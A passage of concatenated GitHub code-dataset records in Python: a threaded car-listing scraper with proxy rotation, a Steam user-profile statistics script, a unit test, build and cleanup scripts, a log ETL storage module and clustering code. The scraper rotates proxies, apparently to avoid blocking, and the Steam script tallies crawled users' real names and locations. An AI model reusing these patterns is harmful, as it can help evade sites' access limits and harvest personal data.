{}\".format(link))\n\t\t\t\tcontinue\n\n\t\t\tdetails = re.split(',|:|{',details)\n\t\t\tdetails = details[:details.index('lists')] + details[details.index('city'):]\n\t\t\tdetails[details.index('city')+1] = re.sub('}','',details[details.index('city')+1])\n\n\t\t\t#collect remaining data from id=\"vdp-specs-content\"\n\t\t\tself.bsParse = self.bsObj.findAll('div',{'id':'vdp-specs-content'})\n\t\t\ttry:\n\t\t\t\tself.bsParse = re.sub('\\\\n|
|
|',' ',str(self.bsParse[0]).lower())\n\t\t\texcept:\n\t\t\t\tlogging.warning('Extra details id=\"vdp-specs-content\" are not available in source for this listing at url: {}'.format(link))\n\t\t\t\tcontinue\n\n\t\t\tself.bsParse = re.split('
|
|
',self.bsParse)\n\t\t\tfor item in range(len(self.bsParse)): self.bsParse[item] = self.bsParse[item].strip()\n\n\t\t\tdetails = details + self.bsParse\n\t\t\t#add to vehicle_details dict\n\t\t\tfor key in vehicle_details:\n\t\t\t\tindex = details.index(key)\t\t\t\t\t#TODO: error handling on .index()\n\t\t\t\tvehicle_details[key] = details[index+1]\n\n\t\t\tself.vehicles.append(vehicle_details)\n\n\t\tself.links = []\n\t\treturn self.vehicles\n\n\tdef run(self):\n\n\t\tlast_page = False\n\t\tprint('starting {} ...'.format(self.getName()))\n\t\tself.path = Q.get()\n\t\tself.update_request(self.path)\n\n\t\twhile (last_page==False):\n\n\t\t\tself.gather_links()\n\t\t\tprint('{} gathered link details ...'.format(self.getName()))\n\t\t\tvehicles = self.gather_details()\n\t\t\tprint('{} gathered vehicle details ...'.format(self.getName()))\n\n\t\t\tdb_lock.acquire()\n\t\t\tprint('{} acquired the lock ...'.format(self.getName()))\n\t\t\tself.update_db(vehicles)\n\t\t\tdb_lock.release()\n\t\t\tprint('{} released the lock ...'.format(self.getName()))\n\n\t\t\t#Rotate fresh proxies\n\t\t\t#-----------------------------------------------------------------\n\t\t\tif (len(Crawler.proxies) <= 10) and (proxy_lock.acquire(False)):\n\t\t\t\tprint('{} rotating fresh proxies ...'.format(self.getName()))\n\t\t\t\tlogging.info('{} ROTATING FRESH PROXIES'.format(self.getName()))\n\t\t\t\tself.main_Q.put(True)\n\t\t\t\tfresh_proxies = self.worker_Q.get()\n\t\t\t\tCrawler.proxies += fresh_proxies\n\t\t\t\tproxy_lock.release()\n\t\t\t#-----------------------------------------------------------------\n\n\t\t\tself.path = Q.get()\n\t\t\tself.update_request(self.path)\n\n\t\t\tlast_page = self.check_page_index()\n\t\t\t#stop main loop from listening for fresh proxies\n\t\t\tif last_page: self.main_Q.put(False)\n\t\t\tprint('{} last page is {} ...'.format(self.getName(),last_page))\n\n\nif __name__ == '__main__':\n\t'''\n\tautotrader.ca search returns a maximum of 1000 indices when 100 postiings per page is set. 
By breaking the search\n\tinto price intervals, this allows the search to stay below the 1000 index max.\n\t'''\n\t#parse command line arguments\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument(\"-threads\",\"--threads\", type=int, default=10)\n\tparser.add_argument(\"-proxy_total\",\"--proxy_total\", type=int, default=60)\n\tparser.add_argument(\"-proxy_refresh\",\"--proxy_refresh\", type=int, default=30)\n\tparser.add_argument(\"-proxy_wait\",\"--proxy_wait\", type=int, default=30)\n\tparser.add_argument(\"-timeout\",\"--timeout\", type=int, default=0)\n\n\targs = parser.parse_args()\n\n\t#global variables\n\tprice_range = [(1001,10000),(10001,20000),(20001,30000),(30001,40000),(40001,50000),(50001,60000),\n\t\t\t\t\t(60001,70000),(70001,80000),(80001,90000),(90001,100000),(100001,200000),(200001,2000000)]\n\n\tmax_index = 1000\n\tnum_proxies = args.proxy_total\n\tcycled_proxies = args.proxy_refresh\n\ttimeout = args.timeout\n\tproxy_wait = args.proxy_wait\n\tset_threads = args.threads\n\tthreads,proxies = [],[]\n\tdb_lock = Lock()\n\tproxy_lock = Lock()\n\tmain_Q = queue.Queue()\n\tworker_Q = queue.Queue()\n\tlogging.basicConfig(filename='error.log',level=logging.INFO,format='%(asctime)s:%(threadName)s:%(levelname)s:%(message)s')\n\n\t#main loop\n\tlogging.info(\"STARTING NEW ITERATION\")\n\tfor current_range in range(len(price_range)):\n\t\tprint('-----------------------------------------------------------------------------')\n\t\tprint('populating queue for range {} ...'.format(price_range[current_range]))\n\t\tprint('-----------------------------------------------------------------------------')\n\t\tQ = get_q(current_range)\n\t\tprint('retrieving proxies ...')\n\t\tprint('-----------------------------------------------------------------------------')\n\n\t\twhile len(proxies)= 2017][\"Id\"].count())\nten_or_more_games_factor = of_total_count(dfg_gc[dfg_gc[\"count\"] >= 10].count()[\"count\"])\nfifty_or_more_games_factor = of_total_count(dfg_gc[dfg_gc[\"count\"] >= 50].count()[\"count\"])\n\nprint(\"Currently crawled users: {}\".format(total_count))\nprint(\"{}% have provided a real name\".format(real_name_factor))\nprint(\"{}% have set a country\".format(country_factor))\nprint(\"{}% provided a city and state additionally to the country\".format(city_state_country_factor))\nprint(\"{}% of the crawled users have set their profile to private\".format(private_factor))\nprint(\"{}% of the crawled users are active (Logged in at least once this year)\".format(active_account_factor))\nprint(\"{}% have 10 games or more\".format(ten_or_more_games_factor))\nprint(\"{}% have 50 games or more\".format(fifty_or_more_games_factor))\n\n# Calculate graph data and display graphs\n\n# Game count\n\n# dfg_gc[\"count\"] = pd.cut(dfg_gc[\"count\"], [0, 1, 10, 25, 50, 100, 500, 30000],\n# labels=[\"0\", \"1 - 9\", \"10 - 24\", \"25 - 49\", \"50 - 99\", \"100 - 499\", \"500 +\"])\n# ax = sns.countplot(x=dfg_gc[\"count\"])\n# ax.set(xlabel=\"Game count\", ylabel=\"Number of players\")\n\n\n# Friend count\n\ndff_gc[\"friendcount\"] = pd.cut(dff_gc[dff_gc[\"friendcount\"] <= 50], [1, 50, 100, 150, 200, 250, 300, 350, 400, 999999],\n labels=[\"1 - 49\", \"50 - 99\", \"100 - 149\", \"150 - 199\", \"200 - 249\", \"250 - 299\",\n \"300 - 349\", \"350 - 399\", \"400+\"])\n\naxf = sns.countplot(x=dff_gc[\"friendcount\"])\naxf.set(xlabel=\"Friend count\", ylabel=\"Number of players\")\nfor item in ([axf.title, axf.xaxis.label, axf.yaxis.label] +\n axf.get_xticklabels() + axf.get_yticklabels()):\n 
item.set_fontsize(20)\nplt.show()\n","repo_name":"shiaky/mining_steam","sub_path":"code/data_explorer.py","file_name":"data_explorer.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"5379032926","text":"import os, sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../..\"))\nimport unittest\nfrom sorting_searching.peak_element import PeakElement\n\nclass TestPeakElement(unittest.TestCase):\n def setUp(self):\n self.func = PeakElement()\n\n def test_1(self):\n nums = [1,2,3,1]\n expected = 2\n self.assertEqual(self.func.findPeakElement(nums), expected)\n\n def test_2(self):\n nums = [1,2,1,3,5,6,4]\n expected = [1, 5]\n self.assertIn(self.func.findPeakElement(nums), expected)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"yokolet/tranquil-beach-python","sub_path":"tranquil-beach/test/sorting_searching_test/test_peak_element.py","file_name":"test_peak_element.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20714453982","text":"#!/usr/bin/env python3\n#coding=utf-8\nimport os, sys\n\n\nDIR_UTILIDADES=\"..\" + os.sep + \"utilidades\" + os.sep + \"src\"\nprint (DIR_UTILIDADES)\n\n\nsys.path.insert(0, DIR_UTILIDADES)\nfrom utilidades.ficheros.GestorFicheros import GestorFicheros\ngf=GestorFicheros()\n\ngf.ejecutar_comando(\"./descargador_html.py\", \"\")\ngf.ejecutar_comando(\"./procesador_centros.py\", \">\", \"centros_region.sql\")\ngf.ejecutar_comando (\"cat centros_region.sql\", \"|\", \"sqlite3 ../../docencia.db\")\n","repo_name":"OscarMaestre/pruebas_proceso","sub_path":"descargador_html/dodo.py","file_name":"dodo.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20556580579","text":"# coding: utf-8\n\n\"\"\"\nManagement command to clean up any old files in the oppia uploads directory\n\"\"\"\nimport os\nimport shutil\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\n\nfrom oppia.models import Course\n\n\nclass Command(BaseCommand):\n help = \"Cleans up any old files in the oppia uploads and courses directory\"\n\n def handle(self, *args, **options):\n self.remove_no_matching_courses()\n self.remove_courses_no_file()\n self.remove_old_expanded_folders()\n\n def remove_no_matching_courses(self):\n \"\"\"\n Remove files that don't have matching courses\n \"\"\"\n files = os.listdir(settings.COURSE_UPLOAD_DIR)\n for filename in files:\n if filename.endswith(\".zip\"):\n # find out if it's a live course file\n courses = Course.objects.filter(filename=filename)\n if courses.count() == 0:\n # delete the file\n os.remove(os.path.join(settings.COURSE_UPLOAD_DIR,\n filename))\n self.stdout.write(\"Removed: \" + filename)\n\n def remove_courses_no_file(self):\n \"\"\"\n Flag up courses that don't have files\n \"\"\"\n courses = Course.objects.all()\n for course in courses:\n if not os.path.isfile(os.path.join(settings.COURSE_UPLOAD_DIR,\n course.filename)):\n self.stdout \\\n .write(\"FILE MISSING: %s for %s \" % (course.filename,\n course.title))\n\n def remove_old_expanded_folders(self):\n \"\"\"\n Remove old expanded folders from media/courses\n \"\"\"\n try:\n files = os.listdir(os.path.join(settings.MEDIA_ROOT, 'courses'))\n for filename in files:\n if os.path.isdir(\n os.path.join(settings.MEDIA_ROOT,\n 'courses',\n filename)):\n courses = Course.objects.filter(shortname=filename)\n if courses.count() == 0:\n shutil.rmtree(os.path.join(settings.MEDIA_ROOT,\n 'courses',\n filename))\n self.stdout.write(\"Removed: \" + filename)\n except FileNotFoundError: # dir doesn;t exsit\n pass\n","repo_name":"DigitalCampus/django-oppia","sub_path":"oppia/management/commands/cleanup_uploads.py","file_name":"cleanup_uploads.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"}
+{"seq_id":"29582603882","text":"import copy\nfrom typing import Union\n\nfrom django.core.cache import cache\nfrom django.conf import settings\nfrom django.utils.module_loading import import_string\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom apps.api import TransferApi\nfrom apps.exceptions import ValidationError, ApiResultError\nfrom apps.log_databus.constants import BKDATA_ES_TYPE_MAP, EtlConfig, FIELD_TEMPLATE, CACHE_KEY_CLUSTER_INFO\nfrom apps.log_databus.exceptions import EtlParseTimeFieldException, HotColdCheckException\nfrom apps.log_databus.handlers.collector_scenario import CollectorScenario\nfrom apps.log_databus.models import CollectorConfig, CollectorPlugin\nfrom apps.log_databus.utils.es_config import get_es_config\nfrom apps.log_search.constants import FieldBuiltInEnum, FieldDataTypeEnum\nfrom apps.utils import is_match_variate\n\n\nclass EtlStorage(object):\n \"\"\"\n 清洗入库\n \"\"\"\n\n # 子类需重载\n etl_config = None\n separator_node_name = \"bk_separator_object\"\n\n @classmethod\n def get_instance(cls, etl_config=None):\n mapping = {\n EtlConfig.BK_LOG_TEXT: \"BkLogTextEtlStorage\",\n EtlConfig.BK_LOG_JSON: \"BkLogJsonEtlStorage\",\n EtlConfig.BK_LOG_DELIMITER: \"BkLogDelimiterEtlStorage\",\n EtlConfig.BK_LOG_REGEXP: \"BkLogRegexpEtlStorage\",\n }\n try:\n etl_storage = import_string(\n \"apps.log_databus.handlers.etl_storage.{}.{}\".format(etl_config, mapping.get(etl_config))\n )\n return etl_storage()\n except ImportError as error:\n raise NotImplementedError(f\"{etl_config} not implement, error: {error}\")\n\n @classmethod\n def get_etl_config(cls, result_table_config, default=\"bk_log_text\"):\n \"\"\"\n 根据RT表配置返回etl_config类型\n \"\"\"\n separator_node_action = result_table_config.get(\"option\", {}).get(\"separator_node_action\")\n return {\"regexp\": \"bk_log_regexp\", \"delimiter\": \"bk_log_delimiter\", \"json\": \"bk_log_json\"}.get(\n separator_node_action, default\n )\n\n def etl_preview(self, data, etl_params) -> list:\n \"\"\"\n 字段提取预览\n :param data: 日志原文\n :param etl_params: 字段提取参数\n :return: 字段列表 list\n \"\"\"\n raise NotImplementedError(_(\"功能暂未实现\"))\n\n def get_bkdata_etl_config(self, fields, etl_params, built_in_config):\n raise NotImplementedError(_(\"功能暂未实现\"))\n\n def get_result_table_config(self, fields, etl_params, built_in_config, es_version=\"5.X\"):\n \"\"\"\n 配置清洗入库策略,需兼容新增、编辑\n \"\"\"\n raise NotImplementedError(_(\"功能暂未实现\"))\n\n def get_result_table_fields(self, fields, etl_params, built_in_config, es_version=\"5.X\"):\n \"\"\"\n META\n \"\"\"\n # field_list\n field_list = built_in_config.get(\"fields\", [])\n etl_flat = etl_params.get(\"etl_flat\", False)\n\n # 是否保留原文\n if etl_params.get(\"retain_original_text\"):\n field_list.append(\n {\n \"field_name\": \"log\",\n \"field_type\": \"string\",\n \"tag\": \"metric\",\n \"alias_name\": \"data\",\n \"description\": \"original_text\",\n \"option\": {\"es_type\": \"text\", \"es_include_in_all\": True}\n if es_version.startswith(\"5.\")\n else {\"es_type\": \"text\"},\n }\n )\n\n # 默认使用上报时间做为数据时间\n time_field = built_in_config[\"time_field\"]\n built_in_keys = FieldBuiltInEnum.get_choices()\n\n etl_field_index = 1\n clustering_default_fields = self._get_log_clustering_default_fields()\n for field in fields:\n # 当在聚类场景的时候 不做下面的format操作\n if etl_flat and field[\"field_name\"] in clustering_default_fields:\n field_list.append(field)\n continue\n # 过滤掉删除的字段\n if field[\"is_delete\"]:\n continue\n\n # 设置字段的来源与目标存储\n source_field = field[\"field_name\"]\n target_field = 
field[\"field_name\"]\n if field.get(\"alias_name\") and self.etl_config in [EtlConfig.BK_LOG_JSON]:\n target_field = field[\"alias_name\"]\n\n if target_field.lower() in built_in_keys:\n raise ValidationError(_(\"字段不能与标准字段重复\") + f\":{target_field}\")\n\n if not is_match_variate(target_field):\n raise ValidationError(_(\"字段名不符合变量规则\"))\n\n # option, 非时间字段的option里的time_zone和time_format都为\"\", 不需要入库\n field_option = {k: v for k, v in field.get(\"option\", {}).items() if k not in [\"time_zone\", \"time_format\"]}\n field_option[\"field_index\"] = etl_field_index\n etl_field_index += 1\n\n # ES_TYPE\n field_option[\"es_type\"] = FieldDataTypeEnum.get_es_field_type(\n field[\"field_type\"], is_analyzed=field[\"is_analyzed\"]\n )\n if field[\"is_analyzed\"] and field.get(\"option\", {}).get(\"es_analyzer\"):\n field_option[\"es_analyzer\"] = field[\"option\"][\"es_analyzer\"]\n\n # ES_INCLUDE_IN_ALL\n if field[\"is_analyzed\"] and es_version.startswith(\"5.\"):\n field_option[\"es_include_in_all\"] = True\n\n # ES_DOC_VALUES\n field_option[\"es_doc_values\"] = field[\"is_dimension\"]\n\n if not etl_flat:\n # REAL_PATH\n field_option[\"real_path\"] = f\"{self.separator_node_name}.{source_field}\"\n\n # 时间字段处理\n if field[\"is_time\"]:\n time_field[\"alias_name\"] = source_field\n time_field[\"option\"][\"real_path\"] = field_option[\"real_path\"]\n time_field[\"option\"][\"time_zone\"] = field[\"option\"][\"time_zone\"]\n time_field[\"option\"][\"time_format\"] = field[\"option\"][\"time_format\"]\n time_field[\"option\"][\"field_index\"] = field_option[\"field_index\"]\n # 删除原时间字段配置\n field_option[\"es_doc_values\"] = False\n\n # 加入字段列表\n field_list.append(\n {\n \"field_name\": target_field,\n \"field_type\": FieldDataTypeEnum.get_meta_field_type(field_option[\"es_type\"]),\n \"tag\": \"dimension\" if field_option.get(\"es_doc_values\", True) else \"metric\",\n \"description\": field.get(\"description\"),\n \"option\": field_option,\n }\n )\n\n field_list.append(time_field)\n return {\"fields\": field_list, \"time_field\": time_field}\n\n def update_or_create_result_table(\n self,\n instance: Union[CollectorConfig, CollectorPlugin],\n table_id: str,\n storage_cluster_id: int,\n retention: int,\n allocation_min_days: int,\n storage_replies: int,\n fields: list = None,\n etl_params: dict = None,\n es_version: str = \"5.X\",\n hot_warm_config: dict = None,\n es_shards: int = settings.ES_SHARDS,\n index_settings: dict = None,\n ):\n \"\"\"\n 创建或更新结果表\n :param instance: 采集项配置/采集插件\n :param table_id: 结果表ID\n :param storage_cluster_id: 存储集群id\n :param retention: 数据保留时间\n :param allocation_min_days: 执行分配的等待天数\n :param storage_replies: 存储副本数量\n :param fields: 字段列表\n :param etl_params: 清洗配置\n :param es_version: es\n :param hot_warm_config: 冷热数据配置\n :param es_shards: es分片数\n :param index_settings: 索引配置\n \"\"\"\n from apps.log_databus.handlers.collector import build_result_table_id\n\n # ES 配置\n es_config = get_es_config(instance.get_bk_biz_id())\n\n # 时间格式\n date_format = es_config[\"ES_DATE_FORMAT\"]\n\n # ES-分片数\n instance.storage_shards_nums = es_shards\n\n # ES-副本数\n instance.storage_replies = storage_replies\n\n # 需要切分的大小阈值,单位(GB)\n if not instance.storage_shards_size:\n instance.storage_shards_size = es_config[\"ES_SHARDS_SIZE\"]\n slice_size = instance.storage_shards_nums * instance.storage_shards_size\n\n # index分片时间间隔,单位(分钟)\n slice_gap = es_config[\"ES_SLICE_GAP\"]\n\n # ES兼容—mapping设置\n param_mapping = {\n \"dynamic_templates\": [\n {\n \"strings_as_keywords\": {\n \"match_mapping_type\": 
\"string\",\n \"mapping\": {\"norms\": \"false\", \"type\": \"keyword\"},\n }\n }\n ],\n }\n if es_version.startswith(\"5.\"):\n param_mapping[\"_all\"] = {\"enabled\": True}\n param_mapping[\"include_in_all\"] = False\n\n params = {\n \"bk_data_id\": instance.bk_data_id,\n # 必须为 库名.表名\n \"table_id\": build_result_table_id(instance.get_bk_biz_id(), table_id),\n \"is_enable\": True,\n \"table_name_zh\": instance.get_name(),\n \"is_custom_table\": True,\n \"schema_type\": \"free\",\n \"default_storage\": \"elasticsearch\",\n \"default_storage_config\": {\n \"cluster_id\": storage_cluster_id,\n \"storage_cluster_id\": storage_cluster_id,\n \"retention\": retention,\n \"date_format\": date_format,\n \"slice_size\": slice_size,\n \"slice_gap\": slice_gap,\n \"mapping_settings\": param_mapping,\n \"index_settings\": {\n \"number_of_shards\": instance.storage_shards_nums,\n \"number_of_replicas\": instance.storage_replies,\n },\n },\n \"is_time_field_only\": True,\n \"bk_biz_id\": instance.get_bk_biz_id(),\n \"label\": instance.category_id,\n \"option\": {},\n \"field_list\": [],\n \"warm_phase_days\": 0,\n \"warm_phase_settings\": {},\n \"is_sync_db\": False, # ES的index创建,不做同步创建,走异步任务执行\n }\n index_settings = index_settings or {}\n params[\"default_storage_config\"][\"index_settings\"].update(index_settings)\n\n # 是否启用冷热集群\n if allocation_min_days:\n if not hot_warm_config or not hot_warm_config.get(\"is_enabled\"):\n # 检查集群是否支持冷热数据功能\n raise HotColdCheckException()\n\n # 对于新数据,路由到热节点\n params[\"default_storage_config\"][\"index_settings\"].update(\n {\n f\"index.routing.allocation.include.{hot_warm_config['hot_attr_name']}\": hot_warm_config[\n \"hot_attr_value\"\n ],\n }\n )\n # n天后的数据,路由到冷节点\n params[\"default_storage_config\"].update(\n {\n \"warm_phase_days\": allocation_min_days,\n \"warm_phase_settings\": {\n \"allocation_attr_name\": hot_warm_config[\"warm_attr_name\"],\n \"allocation_attr_value\": hot_warm_config[\"warm_attr_value\"],\n \"allocation_type\": \"include\",\n },\n }\n )\n\n # 获取清洗配置\n collector_scenario = CollectorScenario.get_instance(collector_scenario_id=instance.collector_scenario_id)\n built_in_config = collector_scenario.get_built_in_config(es_version)\n result_table_config = self.get_result_table_config(fields, etl_params, built_in_config, es_version=es_version)\n\n params.update(result_table_config)\n\n # 字段mapping优化\n for field in params[\"field_list\"]:\n # 如果datetype不支持doc_values,则不设置doc_values,避免meta判断类型不一致创建新的index\n if \"es_doc_values\" in field.get(\"option\", {}):\n if field[\"option\"][\"es_doc_values\"] or field[\"option\"][\"es_type\"] in [\"date\", \"text\"]:\n del field[\"option\"][\"es_doc_values\"]\n # 移除计分\n if \"es_type\" in field.get(\"option\", {}) and field[\"option\"][\"es_type\"] in [\"text\"]:\n field[\"option\"][\"es_norms\"] = False\n\n # 时间默认为维度\n if \"time_option\" in params and \"es_doc_values\" in params[\"time_option\"]:\n del params[\"time_option\"][\"es_doc_values\"]\n\n # 获取结果表是否已经创建,如果创建则选择更新\n table_id = \"\"\n try:\n table_id = TransferApi.get_result_table({\"table_id\": params[\"table_id\"]}).get(\"table_id\")\n except ApiResultError:\n pass\n\n # 兼容插件与采集项\n if not table_id:\n # 创建结果表\n table_id = TransferApi.create_result_table(params)[\"table_id\"]\n else:\n # 更新结果表\n params[\"table_id\"] = table_id\n TransferApi.modify_result_table(params)\n cache.delete(CACHE_KEY_CLUSTER_INFO.format(table_id))\n\n if not instance.table_id:\n instance.table_id = table_id\n instance.save()\n\n return {\"table_id\": instance.table_id, 
\"params\": params}\n\n @classmethod\n def switch_result_table(cls, collector_config: CollectorConfig, is_enable=True):\n \"\"\"\n 起停result_table\n :param collector_config: 采集项\n :param is_enable: 是否有效\n :return:\n \"\"\"\n params = {\n \"bk_data_id\": collector_config.bk_data_id,\n # 必须为 库名.表名\n \"table_id\": f\"{collector_config.table_id}\",\n \"is_enable\": is_enable,\n }\n TransferApi.switch_result_table(params)\n return True\n\n @classmethod\n def parse_result_table_config(cls, result_table_config, result_table_storage=None):\n \"\"\"\n 根据meta配置返回前端格式\n :param result_table_config metadata_get_result_table\n :param result_table_storage metadata_get_result_table_storage\n \"\"\"\n\n # 存储配置 && 清洗配置\n collector_config = {\"etl_params\": result_table_config.get(\"option\", {})}\n if result_table_storage:\n collector_config[\"storage_cluster_id\"] = result_table_storage[\"cluster_config\"][\"cluster_id\"]\n collector_config[\"storage_cluster_name\"] = result_table_storage[\"cluster_config\"][\"cluster_name\"]\n collector_config[\"retention\"] = result_table_storage[\"storage_config\"].get(\"retention\")\n collector_config[\"allocation_min_days\"] = result_table_storage[\"storage_config\"].get(\"warm_phase_days\")\n\n # 字段\n built_in_fields = FieldBuiltInEnum.get_choices()\n field_list = []\n time_fields = [item for item in result_table_config[\"field_list\"] if item[\"field_name\"] == \"dtEventTimeStamp\"]\n if not time_fields:\n raise EtlParseTimeFieldException()\n time_field = copy.deepcopy(time_fields[0])\n\n # log clustering fields\n log_clustering_fields = cls._get_log_clustering_default_fields()\n for field in result_table_config[\"field_list\"]:\n # 判断是不是标准字段\n if not field.get(\"is_built_in\", False):\n field[\"is_built_in\"] = True if field[\"field_name\"].lower() in built_in_fields else False\n\n # 聚类保留字段\n if field[\"field_name\"] in log_clustering_fields:\n continue\n\n # 如果有指定别名,则需要调转位置(field_name:ES入库的字段名称;alias_name:数据源的字段名称)\n field_option = field.get(\"option\", {})\n if field_option.get(\"real_path\"):\n field[\"alias_name\"] = field_option[\"real_path\"].replace(f\"{cls.separator_node_name}.\", \"\")\n\n if field.get(\"alias_name\"):\n field[\"field_name\"], field[\"alias_name\"] = field[\"alias_name\"], field[\"field_name\"]\n\n # 如果别名与field_name相同,则不返回\n if field[\"field_name\"] == field[\"alias_name\"]:\n field[\"alias_name\"] = \"\"\n\n # 时间字段处理\n field[\"is_time\"] = False\n if field[\"field_name\"] == time_field[\"alias_name\"]:\n field[\"is_time\"] = True\n field[\"is_dimension\"] = True\n # option\n field_es_type = field[\"option\"][\"es_type\"]\n field[\"option\"] = time_field[\"option\"]\n field[\"option\"][\"time_zone\"] = int(time_field[\"option\"][\"time_zone\"])\n field[\"option\"][\"es_type\"] = field_es_type\n\n es_type = field_option.get(\"es_type\", \"keyword\")\n\n # 字段类型\n field[\"field_type\"] = FieldDataTypeEnum.get_field_type(es_type)\n\n # 分词字段设置\n field[\"is_analyzed\"] = False\n if es_type == \"text\":\n field[\"is_analyzed\"] = True\n field[\"is_dimension\"] = False\n field[\"is_delete\"] = field.get(\"is_delete\", False)\n\n # 如果未设置维度,则获取es_doc_values的值\n if \"is_dimension\" not in field:\n field[\"is_dimension\"] = field_option.get(\"es_doc_values\", True)\n if field_option.get(\"es_type\") == \"text\":\n field[\"is_dimension\"] = False\n\n field_list.append(field)\n\n # 添加删除字段\n if result_table_config[\"option\"].get(\"separator_fields_remove\"):\n fields_remove = result_table_config[\"option\"][\"separator_fields_remove\"].split(\",\")\n for 
field_name in fields_remove:\n field_name = field_name.strip()\n if field_name == \"\":\n continue\n\n field_info = copy.deepcopy(FIELD_TEMPLATE)\n field_info[\"field_name\"] = field_name\n field_list.append(field_info)\n\n collector_config[\"fields\"] = sorted(field_list, key=lambda x: x.get(\"option\", {}).get(\"field_index\", 0))\n return collector_config\n\n def _to_bkdata_assign(self, field):\n key = field.get(\"alias_name\")\n if not key:\n key = field.get(\"field_name\")\n return {\n \"key\": key,\n \"assign_to\": key,\n \"type\": BKDATA_ES_TYPE_MAP.get(field.get(\"option\").get(\"es_type\"), \"string\"),\n }\n\n def _to_bkdata_conf(self, time_field):\n return {\n \"output_field_name\": \"timestamp\",\n \"time_format\": time_field[\"option\"][\"time_format\"],\n \"timezone\": time_field[\"option\"][\"time_zone\"],\n \"encoding\": \"UTF-8\",\n \"timestamp_len\": 0,\n \"time_field_name\": time_field.get(\"alias_name\"),\n }\n\n def _get_bkdata_default_fields(self, built_in_fields, time_field):\n result = [\n self._to_bkdata_assign(built_in_field)\n for built_in_field in built_in_fields\n if not built_in_field.get(\"flat_field\", False)\n ]\n if not time_field.get(\"option\", {}).get(\"real_path\"):\n result.append(self._to_bkdata_assign(time_field))\n result.append(\n self._to_bkdata_assign({\"field_name\": \"time\", \"alias_name\": \"time\", \"option\": {\"es_type\": \"long\"}})\n )\n return result\n\n @classmethod\n def _get_log_clustering_default_fields(cls):\n return {field[\"field_name\"] for field in CollectorScenario.log_clustering_fields()}\n","repo_name":"TencentBlueKing/bk-log","sub_path":"apps/log_databus/handlers/etl_storage/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":19917,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"53"}
+{"seq_id":"28862100727","text":"w = float(input())\nh = float(input())\n\nw_to_cm = w*100\nh_to_cm = h*100\n\nrows = w_to_cm // 120\nh_to_cm -= 100\nburos_in_rows = h_to_cm // 70\n\nseats = rows*buros_in_rows - 3\nprint(seats)","repo_name":"yanchev93/SoftUni-Courses","sub_path":"SoftUni - Python/Python - PBasics/More exercise/PB/1_More_Excersice/5_training_lab.py","file_name":"5_training_lab.py","file_ext":"py","file_size_in_byte":183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"36413492940","text":"from sklearn.cluster import KMeans,DBSCAN\r\nimport numpy as np\r\nimport scipy.io as si\r\nimport matplotlib.pyplot as plt\r\nX, Y, Z = np.loadtxt('filtereddata/XYZ_norm1.txt',skiprows=0,unpack=True)\r\nData = np.column_stack((X,Y,Z))\r\n#Z = np.hsplit(Data,np.array([80])) \r\n\r\n#kmeans =KMeans(n_clusters=2,random_state=42,max_iter=10000,n_init=100).fit(Z[0])\r\n\r\n# epsilon = np.arange(0.1,2,0.025)\r\n\r\n# for e in epsilon:\r\n\r\n# \tdbscan = DBSCAN(eps=e,algorithm='kd_tree', min_samples=2).fit(Data)\r\n# \tprint(e)\r\n# \tprint(dbscan.labels_)\r\n\r\ndbscan = DBSCAN(eps = 0.874,algorithm='kd_tree',min_samples=2).fit(Data)\r\nprint(dbscan.labels_)\r\nprint(Data.shape)\r\n\r\n\r\n\r\n# print(Z)\r\n# pred = Data[1]\r\n\r\n\r\npred = np.column_stack((Data,dbscan.labels_))\r\nprint(pred.shape)\r\n\r\n\r\nfor index in range(0,len(Z)):\r\n\tif(dbscan.labels_[index]<0):\r\n\t\tprint(index)\r\n\t\tt = np.linspace(0, 2, 64, endpoint=False)\r\n\t\tplt.plot(t, Z[index-32:index+32], 'g-', linewidth=2, label='filtered data')\r\n\t\tplt.xlabel('Time [sec]')\r\n\t\tplt.legend()\r\n\t\tplt.show()\r\n\r\n\r\n#np.savetxt('filtereddata/predictxyz1.txt',pred,fmt='%1.15g')\r\n\r\nprint(\"Prediction data ready\")","repo_name":"saainithil97/roadsafe","sub_path":"cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72637773929","text":"#! /usr/bin/env python\n\"\"\"\nConvert empty IPython notebook to a sphinx doc page.\n\"\"\"\nimport io\nimport os\nimport sys\n\nfrom IPython.nbformat import current\n\n\ndef clean_for_doc(nb):\n \"\"\"\n Cleans the notebook to be suitable for inclusion in the docs.\n \"\"\"\n new_cells = []\n for cell in nb.worksheets[0].cells:\n # Remove the pylab inline line cells.\n if \"input\" in cell and \\\n cell[\"input\"].strip().startswith(\"%pylab inline\"):\n continue\n\n # Make sure all cells are padded at the top and bottom.\n if \"source\" in cell:\n cell[\"source\"] = \"\\n\" + cell[\"source\"].strip() + \"\\n\\n\"\n\n # Remove output resulting from the stream/trace method chaining.\n if \"outputs\" in cell:\n outputs = [_i for _i in cell[\"outputs\"] if \"text\" not in _i or\n not _i[\"text\"].startswith(\"= os.path.getmtime(nbname):\n print(\"\\t%s is up to date; nothing to do.\" % rst_name)\n return\n\n os.system(\"runipy --o %s --matplotlib --quiet\" % nbname)\n\n with io.open(nbname, 'r', encoding='utf8') as f:\n nb = current.read(f, 'json')\n nb = clean_for_doc(nb)\n print(\"Writing to\", nbname)\n with io.open(nbname, 'w', encoding='utf8') as f:\n current.write(nb, f, 'json')\n\n # Convert to rst.\n os.system(\"jupyter nbconvert --to rst %s\" % nbname)\n\n with io.open(nbname, 'r', encoding='utf8') as f:\n nb = current.read(f, 'json')\n nb 